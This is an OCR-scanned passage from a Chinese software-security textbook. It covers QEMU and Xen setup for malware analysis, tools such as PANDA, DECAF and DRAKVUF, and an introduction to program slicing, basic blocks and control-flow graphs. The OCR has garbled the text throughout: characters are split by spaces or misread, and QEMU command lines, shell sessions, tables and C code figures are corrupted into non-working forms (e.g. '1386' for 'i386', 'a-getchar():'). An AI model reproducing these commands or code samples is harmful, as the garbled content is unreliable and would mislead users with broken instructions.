虚拟 机 的 系统 安装 使 用 qemu-system-i386 程序 ,该 程序 支持 32 位 的 系统 。 安 装 命 
令 如 下 : 


qemu- system- 1386 -hda [win7.qcow2] -cdrom [win7.iso] -boot d -enable- kvm 


其 中 -hda 指定 操作 系统 要 安装 到 镜像 磁盘 win7. qcow2,-cdrom 指定 了 操作 系统 安装 包 
win7. iso,-boot d 指定 了 从 光盘 引导 启动 ,-enable-kvm 指定 了 开启 kvm 加 速 , 如 果 不 开 
启 kvm, 安 装 会 非常 慢 , 开 启 kvm 之 后 ,安装 速度 与 在 物理 设备 上 安装 系统 的 速度 基本 一 
致 。 使 用 kvm 安装 完 镜像 之 后 ,将 镜像 复制 到 其 他 物理 主机 ,并 以 kvm 加 速 的 形式 启 
动 ,有 可 能 因为 CPU 核 数 不 一 致 而 无 法 启动 。 

3) 虚拟 机 的 启动 

虚拟 机 启动 的 命令 如 下 : 

qemu- system- i386 [win7.qcow2]- monitor stdio -m [1024] - soundhw all - net nic,model- 

rt18139 -net user - snapshot -usb ~ usbdevice tablet -vnc :25 


其 中 win7. qcow2 是 镜像 文件 ;-monitor stdio 是 命令 解析 模块 ,启动 之 后 可 以 通过 命令 控 
制 demu;-m[1024] 指 定 虚拟 机 的 内 存 为 1024MB;-soundhw all 开启 所 有 支持 型 号 的 声 
卡 ,运行 音 视 频 软 件 需 要 使 用 该 参数 ;-net nic,model=rtl8139 -net user 是 启用 网 卡 支持 
的 参数 ;-snapshot 是 以 快照 形式 启动 ,为 了 避免 镜像 被 修改 破坏 ,如 果 需 要 修改 镜像 , 比 
如 安装 软件 ,就 不 要 使 用 此 参数 ;-usb -usbdevice tablet 设置 支持 USB 鼠标 键盘 ;-vnc : 
25 开启 vnc, 端 口号 25 ,开启 vne 后 本 地 启动 时 没有 GUI 窗口 ,需要 用 vne 连接 。 

4) 与 QEMU 交互 的 控制 命令 

使 用 -monitor stdio 启动 命令 解析 模块 之 后 ,可 以 通过 命令 控制 QEMU ,如 图 3-60 所 
示 ,通过 命令 建立 查找 加载 快照 。 





(qemu) info snapshots 

There is no snapshot available. 
(qemu) savevm testi 

(qemu) info snapshots 





ID TAG VM SIZE DATE VM CLOCK 
1 testi 181M 2015-12-23 06:53:06 00:01:12.637 
(qemu) loadvm testi 

(genu) 








图 3-60 QEMU 的 命令 交互 控制 
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常用 的 QEMU 交互 控制 命令 如 表 3-2 所 示 ,对 命令 不 熟悉 时 可 按 Tab 键 进行 提示 。 
表 3-2 QEMU 常用 交互 控制 命令 





























交互 控制 功能 命 * 

加 载 光驱 文件 change idel -cd0 [X X X X X. iso] 

HRR eject idel -cd0 

保存 快照 savevm [snapshotname] 

加 载 快 照 loadvm [snapshotname] 

信息 查看 info [infotype](infotype 为 snapshots usb, mem uuid, roms, vnc 等 ) 
模拟 键盘 按键 sendkey kp_enter( 模 拟 回 车 键 ) 

退出 QEMU quit 

2. 数据 交互 


QEMU 使 用 过 程 较为 复杂 ,虚拟 机 与 主机 之 间 的 数据 文件 共享 方式 不 如 VMWare 
和 VirturalBox 方便 ,无 法 进行 拖 忠 式 的 复制 .粘贴 。 将 物理 主机 文件 复制 到 QEMU 虚 
拟 机 内 部 的 方法 是 将 文件 制作 成 iso 镜像 ,然后 通过 光盘 加 载 到 虚拟 机 ,命令 是 : mkisofs 
-o cdrom. iso . /datadir, 其 中 cdrom. iso 是 生成 的 目标 镜像 文件 ,datadir 是 源 文 件 存放 的 
文件 夹 路 径 , 如 图 3-61(a) 所 示 , 这 种 方式 只 能 将 数据 传人 虚拟 机 ,无 法 传 出 。 要 读 取 虚 拟 
机 内 部 的 文件 ,可 以 将 磁盘 镜像 挂 载 到 文件 系统 中 ,然后 直接 读 取 磁 盘 内 部 文件 ,步骤 如 
图 3-61(b) 所 示 ,首先 载 人 nbd 模块 ,然后 使 用 qemu-nbd 将 镜像 与 设备 /dev/nbd0 建立 
连接 ,最 后 将 设备 /dev/nbd0 挂 载 到 文件 夹 IMG。 通 过 浏览 文件 夹 IMG. 即 可 读 取 虚拟 机 
镜像 内 的 文件 ,该 文件 夹 可 读 可 写 , 写 入 的 数据 能 够 回 写 到 qcow2 镜像 文件 ,实现 数据 双 
向 传输 ,这 种 传输 并 非 实 时 同步 ,需要 重新 执行 mount 或 者 重启 虚拟 机 才能 更 新 数据 。 
不 建议 在 虚拟 机 运行 过 程 中 对 磁盘 进行 写 操作 ,否则 容易 导致 文件 夹 损坏 或 者 磁盘 损坏 。 


aotagaota-OptiPlex-998:-$ sudo modprobe nbd max part-63 

[sudo] password for aota: 

aotagaota-OptiPlex-998:-$ sudo -/aotasrc/qemu-1.7.0/install/bin/qemu-nb 
d -c /dev/nbde -/DataDisk/winxp-os /winxpspo .qcow2 
aotagaota-OptiPlex-999:-$ sudo mount E Lees IMG 

The disk contains an unclean file system (8, 8) 

The file system wasn't safely closed on ARE Fixing. 
aotagaota-OptiPlex-998:-$ cd IMG 

aotagaota-OptiPlex-999:-/IMCS ls 


(a) 加 载 光驱 到 虚拟 机 (b) 挂 载 虚拟 机 磁盘 到 物理 主机 文件 系统 
图 3-61 QEMU 虚拟 机 与 外 界 数据 交换 设置 








3. 基于 QEMU 的 扩展 平台 介绍 

QEMU 是 遵循 GPL 许可 的 开源 软件 ,可 对 其 进行 修改 和 扩展 ,在 其 平台 上 对 解析 指 
令 过 程 进行 插 桩 ,解析 系统 环境 内 存 中 的 关键 数据 结构 可 获取 运行 系统 的 进程 信息 、 指 令 
信息 ,指令 操作 数 的 值 等 关键 数据 ,对 这 些 数据 进行 存储 可 作为 后 续 程序 分 析 的 基础 。 这 
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种 方式 不 改变 程序 的 运行 环境 ,应 用 程序 无 法 感知 到 外 部 的 监控 调试 ,能 够 避 开 反 调试 技 
术 。 典 型 的 扩展 案例 包括 BitBlaze 中 的 TEMU、PANDA、DECAF, 这 些 平台 都 是 基于 
QEMU 进行 扩展 ,结合 污点 传播 等 技术 用 于 恶意 代码 分 析 和 漏洞 分 析 。 其 中 TEMU 是 
最 早 的 使 用 QEMU 进行 扩展 ,构建 二 进 制 代码 分 析 平台 的 工具 ;PANDA 提供 插件 接口 ， 
并 且 具 有 重 放 功 能 ,能 够 在 轻 量 级 监控 条 件 下 运行 系统 内 程序 ,然后 在 重 放 过 程 中 添加 高 
负载 的 监控 ,解决 了 部 分 软件 无 法 在 性 能 太 差 的 环境 下 运行 的 问题 ;DECAF 实现 了 比特 
级 的 污点 传播 分 析 , 并 且 还 有 Android 版 本 的 DroidScope。 

与 VMWare 和 VirtualBox 相 比 ,QEMU 使 用 的 是 软件 虚拟 化 技术 ,其 性 能 相对 较 
差 ,但 通过 -enable-kvm 启用 加 速 模块 ,可 以 达到 与 前 两 者 同样 的 性 能 。QEMU 的 优势 特 
点 在 于 其 开源 特性 ,有 大 量 的 分 析 平 台 基 于 QEMU 进行 扩展 。 更 多 关于 QEMU 的 资料 
可 从 http://www. qemu. org 获取 。 


334 Xen 


Xen 是 由 英国 剑桥 大 学 开发 的 开源 虚拟 化 平台 ,与 QEMU 相 比 , 它 没有 自身 的 指令 
翻译 ,而 是 采用 了 硬件 虚拟 化 技术 。Xen 的 虚拟 化 技术 包含 了 全 虚拟 化 (full 
virtualization) 和 半 虚 拟 化 (para virtualization) 的 技术 。 

Xen 环境 包含 两 个 组 成 部 分 ,一 个 是 虚拟 机 监控 器 , 另 一 个 是 虚拟 机 。 虚 拟 机 监控 器 
简称 VMM , 介 于 硬件 和 虚拟 机 之 间 ,被 称 作 Hypervisor Jz .虚拟 机 部 署 在 Hypervisor 层 
之 上 。 和 运行 于 Xen 上 的 虚拟 机 通常 被 称 为 domain, 一 套 物 理 硬件 上 可 以 运行 多 台 虚 拟 
机 ,其 中 一 台 为 管理 者 ,被 称 为 domain0, 其 他 的 虚拟 机 被 称 为 domainU 。domain0 享有 
最 高 优先 级 ,负责 与 硬件 交互 ,也 称 为 特权 domain。domainU 需要 domain0 的 协助 ,属于 
无 特权 domain。 

DRAKVUF 是 典型 的 基于 Xen 的 恶意 代码 动态 分 析 系 统 ,该 系统 建立 在 Xen、 
LibVMI、Volatility 和 Rekall 的 基础 上 。DRAKVUF 能 够 在 虚拟 机 内 部 无 须 安装 任何 辅 
助 分 析 软 件 的 前 提 下 ,追踪 运行 中 的 恶意 样本 ,并 从 内 存 中 提取 被 删除 的 文件 。 
DRAKVUF 所 用 的 硬件 虚拟 化 是 基于 Intel 的 CPU,CPU 需要 支持 VT-x 技术 ,无 法 支 
持 AMD 等 其 他 的 CPU。 目前 支持 的 操作 系统 包括 32 位 和 64 位 的 Windows 7. 

更 多 关于 Xen 的 资料 可 从 http://www. xenproject. org/ 获 取 。 


3.4 小 结 


本 章 从 静态 分 析 、 动 态 分 析 、 虚 拟 化 辅助 分 析 3 个 角度 介绍 了 软件 安全 分 析 基 础 工 
具 。 静 态 分 析 的 优点 是 无 须 执行 软件 程序 ,分 析 速 度 快 ,代码 覆盖 率 高 ,平台 兼容 性 好 ; 缺 
点 是 缺少 函数 、 指 令 的 具体 参数 值 , 无 法 获得 准确 的 执行 逻辑 关系 , 受 代码 加 壳 影 响 大 , 恶 
意 代码 检测 误 报 率 较 高 。 动 态 分 析 的 优点 是 能 够 准确 观测 程序 的 行为 ,能 够 获取 真实 的 
执行 逻辑 ,能 够 获取 执行 过 程 中 函数 和 指令 参数 的 具体 值 ;缺点 是 代码 覆盖 率 较 低 , 会 受 
到 反 调 试 技术 的 干扰 。 虚 拟 化 辅助 分 析 的 优点 是 能 够 固化 分 析 环 境 , 避 免 反 调试 的 干扰 ， 
获取 的 数据 信息 齐全 ;缺点 是 性 能 较 差 , 受 反 虚拟 化 技术 干扰 , 受 超时 机 制 影响 较 大 。 
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程序 切片 


程序 切片 是 一 种 重要 的 程序 分 解 技术 , 它 有 助 于 使 用 者 增强 对 程序 内 部 结构 ,数据 处 
理 流程 的 理解 ,是 程序 分 析 方 法 的 重要 研究 方向 之 一 ,在 软件 调试 .软件 维护 、 软 件 测试 等 
领域 有 广泛 的 应 用 。 此 外 ,程序 切片 作为 一 种 程序 分 析 基 础 方法 也 应 用 于 软件 安全 分 析 
领域 中 ,在 程序 和 网 络 协议 逆向 ,软件 漏洞 成 因 和 机 理 分 析 、 软 件 漏洞 利用 自动 生成 等 领 
域 都 发 挥 了 重要 作用 。 

本 章 将 对 程序 切片 方法 进行 介绍 ,首先 对 程序 切片 的 基础 知识 和 基本 原理 进行 介绍 ， 
然后 分 别 对 静态 程序 切片 和 动态 程序 切片 进行 讲解 。 


4.1 概 述 


程序 切片 旨 在 从 程序 中 提取 满足 一 定 约束 条 件 的 代码 片段 (对 指定 变量 施加 影响 的 
代码 、 指 令 ,或 者 指定 变量 所 影响 的 代码 片段 ) ,是 一 种 重要 的 程序 分 解 技 术 。 

分 解 (decomposition 或 者 factoring) 是 一 种 常用 的 问题 分 析 和 理解 的 方式 ,在 计算 机 
领域 ,分 解 通常 体现 为 将 某 个 事物 (如 程序 或 程序 架构 设计 模型 ) 划 分 为 若干 个 部 分 来 增 
进 对 其 的 理解 。 例 如 ,在 软件 工程 领域 ,从 设计 研发 到 维护 的 整个 过 程 都 离 不 开 分 解 。 在 
软件 设计 阶段 ,架构 师 会 将 软件 架构 模型 在 整体 上 按照 功能 分 解 为 若干 个 模块 ,每 个 模块 
内 部 又 继续 分 解 为 若干 个 子 模块 。 而 在 软件 研发 阶段 ,程序 员 在 编写 模块 代码 时 ,也 会 将 
模块 内 部 的 功能 划分 为 若干 个 过 程 (函数 ) 或 者 对 象 (面向 对 象 编程 ) ,函数 内 部 也 会 分 解 
为 若干 个 功能 代码 块 (如 在 C 语言 中 , if-else 语句 自然 形成 的 代码 块 划 分 )。 在 软件 维护 
阶段 ,研发 人 员 对 软件 故障 的 定位 也 必然 从 高 层 架构 设计 的 模块 深入 到 低层 的 功能 模块 ， 
按照 分 解 后 的 模块 逐步 排查 除 错 。 软 件 工程 领域 已 经 有 很 多 的 分 解 技术 和 方法 ,如 信息 
隐藏 (软件 架构 设计 中 ,不 同 模块 之 间 互 相隔 离 , 除 接口 外 互相 隐藏 内 部 实现 细节 ) 数据 
抽象 封装 (软件 架构 设计 中 ,不 同 程序 变量 按照 一 定 规则 进行 分 组 合并 ) 以 及 HIPOS 等 ， 
这 些 方 法 通常 都 由 软件 研发 团队 在 设计 阶段 采用 。 而 程序 切片 主要 在 程序 调试 、 优 化 、 排 
错 、 道 向 ,安全 分 析 等 阶段 采用 ,是 在 程序 开发 已 到 一 定 阶段 或 已 完成 情况 下 直接 分 析 程 
序 代码 ,通过 寻找 程序 内 部 的 相关 性 来 分 解 程序 ,然后 针对 分 解 得 到 的 程序 切片 进行 分 析 
来 实现 对 程序 部 分 功能 特性 的 理解 。 


O IBM 公司 于 20 世纪 70 年 代 中 期 在 层次 结构 图 的 基础 上 推出 的 一 种 描述 系统 结构 和 模块 内 部 处 理 功能 的 工 
AER). 
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在 软件 安全 分 析 过 程 中 ,大 多 数 软 件 安全 研究 人 员 都 只 能 针对 大 量 未 开源 二 进 制程 
序 , 或 者 缺乏 文档 的 开源 代码 进行 分 析 , 面临 着 程序 规模 庞大 带 来 的 分 析 效 率 低下 的 问 
题 , 而 程序 切片 能 够 从 大 规模 程序 中 精确 定位 分 析 员 所 关心 的 代码 片段 ,有 效 缓解 了 程序 
规模 日 益 增长 带 来 的 分 析 效 率 难以 同步 提高 的 问题 ,因此 被 普遍 应 用 于 软件 漏洞 机 理 分 
析 、 源 代码 安全 性 检查 以 及 软件 故障 修复 等 软件 安全 分 析 领 域 。 

程序 切片 最 初 由 M. Weiser 在 其 1979 年 的 博士 论文 中 首次 提出 ,并 于 1981 年 中 和 
1984 年 四 的 两 篇 论文 中 正式 公布 包含 原理 、 算 法 、 方 案 和 应 用 在 内 的 完整 程序 切片 方法 
体系 。 其 中 包括 首次 提出 的 程序 切片 概念 ,以 及 基于 控制 流 图 的 程序 切片 计算 方法 。 程 
序 切片 在 20 世纪 八 九 十 年 代 发 展 迅 速 ,目前 程序 切片 技术 理论 体系 已 经 趋 于 完善 ,应 用 
范围 已 经 遍及 软件 调试 .测试 .维护 以 及 安全 分 析 等 领域 。 

按照 国内 学 者 李 必 信忠 提出 的 分 类 方法 ,程序 切片 经 历 了 如 下 4 个 发 展 阶段 : 

(1) 基于 数据 流 方程 求解 的 程序 切片 计算 。 

最 初 由 M. Weiser 博士 提出 的 程序 切片 是 可 执行 切片 中 ,要 求 该 切片 是 源 程序 的 一 
个 行为 上 等 价 的 映射 ,他 提出 了 一 种 近似 计算 方法 ,基于 控制 依赖 图 的 数据 流 方程 求解 来 
计算 程序 切片 。 

(2) 基于 依赖 图 的 程序 切片 计算 。 

K. J. Ottenstein 中 等 人 则 将 切片 问题 转换 为 图 可 达 性 问题 ,能 够 成 功 解决 不 包含 过 
程 的 后 向 切片 问题 。S. Horwitz 四 等 人 提出 了 过 程 间 切 片 概念 以 及 基于 系统 依赖 图 的 切 
片 方 法 ,从 而 解决 了 针对 过 程式 语言 的 静态 切片 计算 问题 。B. Korel 和 J. Laski 等 人 提 
出 动态 切片 的 概念 ,并 通过 扩展 的 数据 流 方程 求解 给 出 切片 计算 方法 。H. Agrawal fl J. 
R. Hogan 中 等 人 则 于 1990 年 提出 基于 动态 依赖 图 的 动态 切片 方法 。 

(3) 面向 对 象 的 程序 切片 计算 。 

在 基本 解决 过 程式 语言 的 切片 计算 问题 以 后 ,学 者 们 对 20 世纪 90 年 代 开 始 流行 的 
面向 对 象 语言 进行 研究 ,其 中 M. J. Horrald 忠 等 人 利用 类 依赖 图 对 系统 依赖 图 进行 扩充 ， 
解决 了 C++ 程序 的 切片 计算 问题 。 

(4) 面向 不 同 应 用 的 各 类 切片 计算 。 

除了 在 语言 层次 对 切片 方法 进行 探索 研究 以 外 ,学 者 们 也 对 面向 不 同 应 用 领域 的 切 
片 方 法 进行 研究 ,提出 了 削 片 外、 砍 片 "9 ,并 将 其 应 用 于 软件 逆向 工程 中、 软件 调试 、 
软件 维护 0”* 本 以 及 软件 可 靠 性 及 安全 性 分 析 5 等 方面 。 


4.2 程序 切片 初探 


程序 切片 主要 用 于 程序 分 解 ,在 能 够 分 解 程序 之 前 必须 对 程序 的 结构 有 一 定 了 解 ,应 
丁 解 牛 之 所 以 游 思 有 余 是 因为 他 熟知 牛 的 生理 结构 ,并 人 掌握 了 针对 每 个 具体 特殊 部 位 该 
如 何 运用 厨 刀 才 能 * 解 牛 ” 的 经 验 知识 ( 即 刀 法 ) 。 本 章 的 程序 切片 就 是 基于 程序 的 局 部 指 
令 和 结构 性 的 信息 (类 似 * 牛 的 生理 结构 ”) ,使 用 各 类 分 析 方 法 (类 似 * 刀 法 ”) 对 程序 
(“ 牛 ”) 进 行 有 条 不 亲 的 分 解 。 在 后 续 详细 介绍 程序 切片 方法 前 ,本 节 从 程序 的 “生理 结 
构 ” 的 认识 入 手 , 对 程序 的 各 类 具体 表现 形式 以 及 抽象 组 成 结构 进行 简单 介绍 ,然后 结合 
简单 的 案例 对 程序 切片 的 典型 流程 步骤 进行 曾 述 ,使 得 读者 对 于 程序 切片 的 背景 和 基础 
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原理 有 概要 的 了 解 。 
421 切片 相关 基础 知识 


程序 切片 的 过 程 是 直接 针对 程序 代码 ( 源 代码 或 者 编译 后 的 二 进 制 代 码 ) 进 行 分 析 ， 
并 依照 分 析 人 员 的 特定 需求 提取 部 分 感 兴趣 的 代码 的 过 程 ,程序 代码 是 实施 切片 的 主要 
目标 对 象 。 要 提取 符合 分 析 人 员 要 求 的 代码 切片 , 离 不 开 对 程序 代码 的 深入 训 析 和 理解 。 

在 目前 通用 计算 机 模型 下 ,程序 代码 是 由 计算 机 操作 指令 (后 文 也 称 “ 语 句 ”) 按 照 一 
定 顺序 组 成 的 序列 ,分 析 人 员 可 资 利 用 的 信息 局 限 在 这 一 指令 序列 上 。 基 于 该 序列 可 以 
直接 获取 两 类 信息 : 控制 流 信息 和 数据 流 信息 。 这 两 类 信息 是 实现 程序 切片 所 依赖 的 最 
重要 的 信息 。 

控制 流 指 程序 中 一 系列 指令 (语句 、 函 数 调 用 ) 执 行 的 顺序 ,程序 指令 中 除 具备 一 定 独 
立 性 的 功能 性 指令 外 ,还 有 相当 一 部 分 对 指令 执行 顺序 进行 控制 的 指令 ,这 些 指令 往往 形 
成 具有 特定 模式 的 控制 结构 。 

例如 ,在 大 多 数 常 用 的 程序 设计 语言 中 都 包含 的 顺序 、 条 件 和 循环 3 种 基本 控制 结 
构 , 这 3 种 结构 分 别 规定 了 程序 指令 执行 的 不 同 顺序 。 

顺序 结构 主要 指 程序 指令 按照 指令 地 址 的 先后 顺序 依次 执行 。 

条 件 结构 包含 约束 判断 和 条 件 主 体 两 部 分 ,只 有 约束 判断 满足 一 定 条 件 的 情况 下 条 
件 主 体 中 的 指令 才能 执行 。 

循环 结构 由 循环 条 件 和 循环 体 构成 ,循环 体内 的 指令 按照 循环 条 件 的 约束 反复 执行 
多 次 。 汇 编 语言 .过 程式 语言 甚至 面向 对 象 语言 都 保留 了 这 3 种 基本 结构 ,如 Intel x86 
汇编 语言 0 包含 loop ,rep mov 等 指令 可 以 形成 循环 结构 ,包含 je、jne、jz、jnz 等 一 系列 条 
件 跳 转 指令 形成 条 件 控 制 结构 。C 语言 也 有 if-else 和 while, for 等 关键 字 支 持 形 成 条 件 
和 循环 结构 ,如 表 4-1 所 示 。 


表 4-1 程序 基本 结构 














结构 类 型 汇编 语言 Ci 语言 C++ 语言 
ik mov eax, 100 i=100; i=100; 
顺序 结构 mov ebx,eax j=i; j-i 
cmp ebx.1 "-— "T 
jne loc. 511344 de ch 2d s 
条 件 结构 mov ecx.1 i j i 775 
loc 511344; mi xn 
j-2 j=2; 
mov ecx,2 
next: while(count—) whileCcount—) 
zh mov dl. chars[ bx] i { 
循环 结构 inc bx *i-t*j *i=*j; 
loop next J ) 
函数 调用 结构 | call sub 51102B Foo funcO ; A. Foo funcO ; 














(D http://www. intel. com/content/www/us/en/processors/architectures-software-developer-manuals. html, 
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本 书 称 这 3 种 基本 结构 为 程序 的 微观 结构 ,程序 员 基于 这 3 种 微观 结构 可 以 构建 更 
为 复杂 的 上 层 结构 。 本 节 对 程序 结构 的 解析 仅仅 基于 这 3 种 结构 进行 拓展 分 析 , 而 对 更 
为 复杂 的 其 他 结构 信息 (如 C 语言 中 的 结构 体 ,C++ 中 的 类 等 ) 本 书 哲 不 讨论 。 

数据 流 是 数据 在 程序 中 一 系列 执行 指令 间 产 生 、 传 递 .复制 和 消失 的 过 程 。 程 序 指令 
(语句 ) 由 变量 定义 ,赋值 或 计算 等 不 同类 型 的 操作 组 成 ,如 图 一 pei 
4-1 所 示 。 而 程序 变量 是 计算 机 存储 数据 的 基本 单元 ,变量 | zars; 
间 发 生 的 赋值 .运算 等 操作 也 就 是 对 数据 的 处 理 ,因此 跨越 多 | 。 3brgetchar0; 
个 程序 指令 (语句) 发 生 的 变量 定义 .赋值 等 指令 产生 了 数据 | Iota 
在 不 同 变量 间 的 传递 , 即 形成 数据 流 。 同 时 数据 流 还 描述 了 | sea 
一 个 或 多 个 变量 从 定义 .引用 到 销毁 清理 等 各 个 阶段 的 信息 。 | Trin d"o) 
例如 ,图 4-1 中 第 2 行 a 赋值 为 5, 数据 5 的 唯一 载体 是 变量 
a, 在 第 4 行 数据 5 被 引用 (作为 加 运算 的 一 部 分 ), 在 第 5 行 
变量 a 被 重新 定义 ,此 时 数据 5 被 销毁 。 由 于 数据 通常 以 变 
景 形式 存在 ,因此 数据 流 分 析 主 要 针对 变量 在 多 条 语句 间或 程序 代码 中 的 复制 .传递 . 修 
改 和 销毁 的 情况 进行 分 析 。 

如 果 各 类 程序 控制 结构 是 软件 的 骨架 ,那么 数据 流 则 可 以 看 成 是 软件 内 部 流动 的 * 血 
液 ", 数 据 流 分 析 对 于 全 面 的 分 解 和 理解 程序 是 不 可 或 缺 的 重要 一 环 。 

本 节 后 续 将 从 程序 的 控制 流 分 析 和 数据 流 分 析 展开 进行 介绍 ,使 得 读者 对 于 切片 相 
关 的 程序 分 析 基础 知识 有 大 致 的 了 解 。 

1. 控制 流 分 析 

针对 大 多 数 程序 ,形成 控制 流 的 程序 控制 结构 主要 有 3 种 , 即 顺 序 结 构 、 条 件 结构 和 
循环 结构 。 其 中 循环 结构 也 可 以 视 为 一 种 特殊 的 条 件 结构 ,熟悉 汇编 语言 的 读者 应 该 了 
fie C 语言 中 while, for 等 循环 语句 在 翻译 为 汇编 指令 时 通常 对 应 jz\jnz\je\jne 等 条 件 指 
令 , 即 使 在 C 语言 中 ,也 可 以 用 和 goto 指令 完全 替代 while 和 for 循环 结构 。 

因此 ,对 于 软件 安全 分 析 中 经 常 接触 的 汇编 语言 代码 或 C 语言 代码 ,程序 的 基本 结 
构 除了 顺序 执行 外 就 是 由 条 件 结构 形成 的 非 顺序 执行 结构 ,本 节 主要 针对 这 两 种 结构 形 
成 的 指令 执行 顺序 进行 控制 流 分 析 方 法 的 介绍 。 

非 顺序 执行 结构 涉及 指令 (或 语句 ) 执 行 跳 转 的 问题 , 即 从 一 条 指令 跳 转 到 另 一 条 指 
令 , 因 此 会 以 跳 转 指令 为 边界 把 代码 分 成 若干 区 域 ,如 条 件 结构 中 if-else 会 将 其 包含 的 代 
码 划分 为 两 个 部 分 ,如 图 4-2(a) 所 示 , 代 码 6 一 7 行 与 11 一 12 行 这 两 个 不 同 的 代码 块 有 不 
同 的 进入 条 件 , 下 一 个 执行 代码 块 的 选择 取决 于 第 4 行 的 判断 条 件 。 而 在 图 4-2(b) 所 示 
中 第 4 行 代码 while 语句 包含 第 6 行 代码 ,该 行 代码 与 其 他 行 代码 分 开 ,执行 条 件 是 
第 4 行 的 判断 语句 。 

图 4-2 中 介绍 的 被 条 件 语句 和 循环 语句 包含 的 代码 块 有 一 个 共同 的 特点 , 即 这 些 代 
码 块 由 连续 的 语句 构成 ,并 且 不 包含 可 以 离开 当前 代码 块 的 语句 。 换 句 话说 ,该 代码 块 执 
行 只 能 从 第 一 条 语句 开始 ,并 且 一 直 执行 到 该 代码 块 的 最 后 一 条 语句 。 这 样 的 一 个 代码 
块 称 为 "基本 块 "。 此 外 ,不 允许 从 基本 块 外 的 指令 跳 转 到 基本 块 中 间 的 某 一 条 指令 执行 。 
严格 地 说 ,基本 块 是 满足 下 列 条 件 的 一 组 连续 指令 代码 ， 














图 4-1 程序 指令 示例 
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1: intab; 
2: a-getchar(): 
3: b-getchar(); 
4: if(a>b) 
$5: 1 
6 a-a*b 1: intab; 1: intajb.c-0; 
7 printf(a): 2: a-getchar(); 2: a-getchar(); 
8 ) 3: b-getchar(); 3: b-getchar(); 
9: else 4:  while(a « b) 4: for(acb;a—) 
10: ( 5: 1 5: ( 
11: a-ab 6: a-a-b 6: c=a+b; 
12: printf(a); JE y 7: ) 
13: ) 8: printf(a): 8: printf(c); 

(a) if-else (b) while (c) for 


图 4-2 示例 代码 片段 


(1) 程序 执行 时 只 能 从 该 基本 块 的 第 一 条 指令 进入 该 基本 块 。 

(2) 程序 执行 时 离开 该 基本 块 前 的 最 后 一 条 指令 必须 是 该 基本 块 的 最 后 一 条 指令 。 

下 面 是 一 个 简单 的 基本 块 计 算 方法 ,为 满足 基本 块 的 第 一 个 条 件 , 需 要 提取 出 所 有 可 
能 的 基本 块 的 第 一 条 指令 (也 称 * 入 口 指令 ”), 所 有 基本 块 第 一 条 指令 的 集合 记 为 
LeaderSet, 常 见 的 入口 指令 包括 程序 的 初始 入 口 指令 , 某 个 函数 (或 过 程 ) 的 第 一 条 指令 ， 
跳 转 指令 的 目的 地 址 对 应 的 指令 (例如 ,C 语言 中 goto 指令 的 目的 地 址 或 者 汇编 语言 中 
JMP 指令 的 目的 地 址 对 应 的 指令 )。 对 于 每 一 个 基本 块 和 人口 指 令 ,按照 顺序 将 后 续 指 令 
纳入 该 基本 块 , 直 到 该 后 续 指 令 为 另外 一 个 人 口 指令 为 止 。 


算法 ”基本 块 计算 方法 


输入 : I= {insi,i€ (1,2,77,n)) // 指 令 序列 
LeaderSet // 基 本 块 首 条 指令 集合 
BlockSet-(/ // 基 本 块 集合 

输出 : 

begin 


for ins in I: 
if ins, 是 人 口 指令 (程序 人 口 指令 ,函数 人 口 指令 、 跳 转 指令 的 目的 地 址 指令 ) 
LeaderSet-LeaderSetU ( ins: } 
for x in LeaderSet: 
BlockSet[x]- ( x) 
i-xtl 
while (i<n and (not i€ LeaderSet)) 
BlockSet [x]- BlockSet [x] U {i} 
i=i+1 


end 


需要 注意 的 是 ,入 口 指令 集合 的 获取 非常 重要 ,比如 ,图 4-3 所 示 的 代码 第 11 和 12 
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inta.b: 

a = getchar(: 

b = getchar(): 

if (a> b) 

{ 
a=a*b 
if (a> 100000) 

goto err; 

printfa); 


DI 
; a--100; 
: em: a--l; 








图 4-3 代码 片段 1 


行 组 成 的 代码 片段 是 顺序 结构 ,应 该 可 以 组 成 一 个 基本 块 ,但 是 由 于 第 8 行 的 代码 有 一 个 
直接 跳 转 的 目的 地 址 是 第 12 行 代码 ,导致 第 11 行 和 第 12 行 分 属于 不 同 的 基本 块 。 此 
外 , 当 目 标 代码 较为 复杂 时 ,尤其 是 直接 针对 二 进 制 软件 反 汇编 后 的 间接 跳 转 指令 (通过 
函数 指针 动态 调用 函数 ) ,获取 入 口 指令 的 难度 也 较 高 ,需要 静态 和 动态 分 析 相 结合 ,获取 
动态 生成 的 函数 地 址 。 

在 实际 的 软件 分 析 过 程 中 ,除了 3 种 基本 的 控制 结构 以 外 ,还 需要 处 理 其 他 形式 
多 样 并 更 为 复杂 的 控制 流 , 如 过 程 调用 、 异 常 处 理 和 系统 中 断 造成 的 控制 流 ,尤其 是 
异常 处 理 和 系统 中 断 都 难以 通过 静态 分 析 直 接 获 得 准确 的 程序 控制 结构 ,本 书 暂 不 
涉及 。 

当 程序 被 划分 为 基本 块 后 ,如 果 将 基本 块 视 为 一 个 基本 单元 节点 ,基本 块 之 间 在 程序 
执行 流程 上 互 为 前 驱 和 后 继 关系 视 为 两 个 基本 块 之 间 存 在 一 条 边 , 则 整个 程序 能 够 转换 
为 一 个 有 向 图 ,该 图 被 称 为 控制 流 图 (Control Flow Graph. CFG) ,这 里 * 控 制 流 ”是 指 程 
序 基 本 块 执行 的 流程 。 例 如 图 4-4 的 程序 指令 到 控制 流 图 转换 的 示例 ,其 中 左 侧 代码 的 
基本 块 分 别 用 数字 进行 编号 , 右 侧 有 向 图 就 是 左 侧 代码 的 控制 流 图 。 









































1: int max(int x , int y){ 

2: — intt-0; == 0 0 

3: it(x y) 0 Pa Ne 
4: tmp-x; iii pu 1 2 
5: else 

6: tmp-y; M ~ < 
7: return tmp; 2 

8: } 








图 4-4 代码 片段 2 及 其 控制 流 图 


控制 流 图 的 构造 方法 如 下 : 
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算法 ”控制 流 图 构造 算法 
输入 : 
BlockList (基本 模块 列表 ) 
BranchMap branchInst— > ( Target(branchInst)] 
// 跳 转 指令 所 在 基本 块 到 跳 转 目的 基本 块 列 表 的 映射 
输出 : cec (控制 流 图 ) 
begin 
for B in BlockList: 
x-B[len(B)-1] 
if x€ BranchMap.keySet // 添 加 跳 转 指令 所 在 基本 块 到 跳 转 目 的 基本 块 之 间 的 边 
for B Target in BranchMap[x]: 
create edge(B,B Target); 
if not x€ BranchMap.keySet // 添 加 非 跳 转 指令 所 在 基本 块 到 其 后 继 基 本 块 之 间 的 边 
create edge(B, Next (B)); 


end 


依据 基本 块 构造 的 有 向 图 G 可 以 表示 为 一 个 四 元 组 ,G= (V E, Entry, Exit) ,其 中 
V 是 基本 块 节点 的 集合 ,E 是 基本 块 之 间 边 的 集合 ,Entry 表示 入 口 基本 块 节点 ,Exit 表 
